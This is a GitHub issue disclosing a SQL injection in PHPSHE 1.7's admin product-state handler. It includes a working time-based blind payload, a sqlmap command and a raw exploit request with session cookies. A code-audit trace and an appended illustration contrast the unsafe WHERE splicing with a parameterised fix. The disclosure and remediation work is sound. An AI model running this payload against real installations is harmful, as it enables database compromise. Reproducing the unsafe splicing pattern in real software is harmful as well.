PHPSHE1.7 admin.php SqlInjection Vulnerability #1

Open
kk98kk0 opened this issue Jan 3, 2019 · 0 comments
Comments

kk98kk0 commented Jan 3, 2019

1. Vulnerability description

Detection object:

(1) website name: PHPSHE CMS system V1.7

(2) website domain name: http://www.phpshe.com/

(3) the IP address: http://www.phpshe.com/down/phpshe1.7.rar

(4) version: PHPSHE B2C system v1.7 (build 20180905 UTF8)

Detection time:

January 3, 2019

Description of vulnerability:

Lingbao JianHao Network Technology Co., Ltd. PHPSHE CMS system: SQL injection vulnerability.

2. POC and verification

Local construction environment:

1. Download the PHPSHE V1.7 mall system from http://www.phpshe.com/down/phpshe1.7.rar

2. Log in to the admin backend at http://localhost/phpshe1.7/admin.php; the username/password is admin/admin.

1. Verify with the following POC.

Vulnerability injection point (sqlmap output):

```
Parameter: Array-like #2* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: checkall=on&product_id[]=2' AND SLEEP(5) AND 'sTmn'='sTmn&product_order[2]=10000&product_id[]=1&product_order[1]=10000
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
```

Vulnerability verification:

```
python sqlmap.py -r 11.txt --batch --random-agent -o --scope='localhost' --dbms=Mysql --current-user -v 5
```

11.txt file contents:

```
POST /phpshe1.7/admin.php?mod=product&act=state&state=1&token=84ba604db8935c8201fa2af409f11741 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost/phpshe1.7/admin.php?mod=product
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Connection: close
Cookie: DedeUserID=1; DedeUserID__ckMd5=c20c15deef949b98; DedeLoginTime=1546408186; DedeLoginTime__ckMd5=569b33049963c9a4; PHPSESSID=egoab0kobof5fo9b53tp1c3qq1; ENV_GOBACK_URL=%2Fuploads%2Fdede%2Fmedia_main.php; _csrf_name_f048d228=436e04b1a14714d2fe8e00a8535f45da; _csrf_name_f048d228__ckMd5=86dfb1e20aa6eb02
Upgrade-Insecure-Requests: 1

checkall=on&product_id%5B%5D=2&product_order%5B2%5D=10000&product_id%5B%5D=1&product_order%5B1%5D=10000
```

current user: 'root@localhost'

Code audit:

Set up the environment locally.

```
POST /phpshe1.7/admin.php?mod=product&act=state&state=1&token=84ba604db8935c8201fa2af409f11741
```

Line 87 of admin.php enters the product.php logic after the submission.


1. The pe_update function updates the database: `product=product $product_id=(sql)$_g_state=state`

2. The pe_update function calls _dowhere to process the conditional statements.

3. The _dowhere function splices the SQL.

4. When the sqlwhere statement is returned after splicing, note that the malicious code has been spliced in successfully.

5. Finally, the database is updated successfully.

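The splicing step the report walks through (request array values concatenated into the WHERE clause) next to a hardened builder, as an added PHP illustration that is not PHPSHE's code: `dowhere_unsafe`, `dowhere_safe` and the sample input array are hypothetical sketches of the bug class, not the project's own `_dowhere`.

```php
<?php
// Added illustration, not PHPSHE's code: a WHERE builder that splices request
// values straight into SQL (the bug class in the report) beside a hardened one.

// Hypothetical sketch of string splicing: array values such as
// $_POST['product_id'][] land in the IN (...) list unescaped and untyped.
function dowhere_unsafe(array $where): string
{
    $parts = [];
    foreach ($where as $field => $value) {
        $vals = is_array($value) ? $value : [$value];
        $parts[] = "`$field` IN ('" . implode("','", $vals) . "')";
    }
    return $parts ? ' WHERE ' . implode(' AND ', $parts) : '';
}

// Hardened version: whitelist the column name, require integer ids, and emit
// placeholders so the values are bound by the driver, never parsed as SQL.
function dowhere_safe(array $where): array
{
    $parts = [];
    $binds = [];
    foreach ($where as $field => $value) {
        if (!preg_match('/^[a-z_]+$/', $field)) {
            throw new InvalidArgumentException("bad column name: $field");
        }
        $vals = is_array($value) ? $value : [$value];
        foreach ($vals as $v) {
            if (!preg_match('/^[1-9][0-9]*$/', (string) $v)) {
                throw new InvalidArgumentException("non-integer id for $field");
            }
            $binds[] = (int) $v;
        }
        $parts[] = "`$field` IN (" . implode(',', array_fill(0, count($vals), '?')) . ')';
    }
    return [$parts ? ' WHERE ' . implode(' AND ', $parts) : '', $binds];
}

// Constructed input shaped like the report's POST body (not a captured request).
$post = ['product_id' => ["2' AND SLEEP(5) AND 'sTmn'='sTmn", '1']];
echo "unsafe:", dowhere_unsafe($post), PHP_EOL;   // the payload text survives in the SQL
try {
    dowhere_safe($post);
} catch (InvalidArgumentException $e) {
    echo "safe: rejected (", $e->getMessage(), ")", PHP_EOL;
}
[$sql, $binds] = dowhere_safe(['product_id' => ['2', '1']]);
echo "safe: ", $sql, ' binds=', json_encode($binds), PHP_EOL;
```

The returned fragment and bind list are meant for a prepared statement (PDO's prepare()/execute(), for example), so the driver rather than string splicing delivers the values to MySQL.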